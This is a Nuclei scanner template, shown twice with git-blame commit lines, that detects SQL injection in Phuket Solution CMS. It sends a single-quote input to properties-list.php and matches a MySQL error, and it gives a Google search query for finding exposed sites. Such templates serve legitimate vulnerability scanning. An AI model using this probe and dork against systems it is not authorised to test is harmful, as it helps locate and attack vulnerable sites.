nuclei-templates/http/vulnerabilities/other/phuket-cms-sqli.yaml

id: phuket-cms-sqli

info:
  name: Phuket Solution CMS - SQL Injection
  author: r3Y3r53
  severity: high
  description: |
    Phuket Solutions CMS is vulnerable to sql injection in which an attacker is able to manipulate an SQL query through user input, causing the application to execute unintended SQL code.
  reference:
    - https://www.exploitalert.com/view-details.html?id=36234
  metadata:
    verified: true
    max-request: 2
    google-query: intext:"Developed by Phuket Solution"
  tags: phuket,sqli,phuket-cms

http:
  - raw:
      - |
        GET /properties-list.php HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /properties-list.php?property-types=%27 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(content_type_2, "text/html")'
          - 'contains(body_2, "You have an error in your SQL syntax") && contains(body_1, "Phuket Solution")'
        condition: and
# digest: 4b0a0048304602210083cfd5718f6d199a231fa3e021c6ffc2e5fb2a826dc6469b6c53f3db0948462602210084d9d1f13969864c1f473a2b10f6dcd23789b195e221212b164b9e2d5ad2be4b:922c64590222798bb761d5b6d8e72950
templates added 2023-10-17 07:20:28 +00:00			`id: phuket-cms-sqli`

			`info:`
			`name: Phuket Solution CMS - SQL Injection`
			`author: r3Y3r53`
			`severity: high`
			`description: \|`
			`Phuket Solutions CMS is vulnerable to sql injection in which an attacker is able to manipulate an SQL query through user input, causing the application to execute unintended SQL code.`
			`reference:`
			`- https://www.exploitalert.com/view-details.html?id=36234`
			`metadata:`
TemplateMan Update [Tue Oct 17 17:52:25 UTC 2023] :robot: 2023-10-17 17:52:26 +00:00			`verified: true`
fixed errors 2023-10-17 08:16:05 +00:00			`max-request: 2`
misc metadata update 2024-01-19 05:41:43 +00:00			`google-query: intext:"Developed by Phuket Solution"`
templates added 2023-10-17 07:20:28 +00:00			`tags: phuket,sqli,phuket-cms`

			`http:`
			`- raw:`
			`- \|`
			`GET /properties-list.php HTTP/1.1`
			`Host: {{Hostname}}`
			`- \|`
			`GET /properties-list.php?property-types=%27 HTTP/1.1`
			`Host: {{Hostname}}`

			`matchers:`
			`- type: dsl`
			`dsl:`
			`- 'status_code_2 == 200'`
			`- 'contains(content_type_2, "text/html")'`
			`- 'contains(body_2, "You have an error in your SQL syntax") && contains(body_1, "Phuket Solution")'`
			`condition: and`
Auto Template Signing [Fri Jan 19 08:44:19 UTC 2024] :robot: 2024-01-19 08:44:19 +00:00			`# digest: 4b0a0048304602210083cfd5718f6d199a231fa3e021c6ffc2e5fb2a826dc6469b6c53f3db0948462602210084d9d1f13969864c1f473a2b10f6dcd23789b195e221212b164b9e2d5ad2be4b:922c64590222798bb761d5b6d8e72950`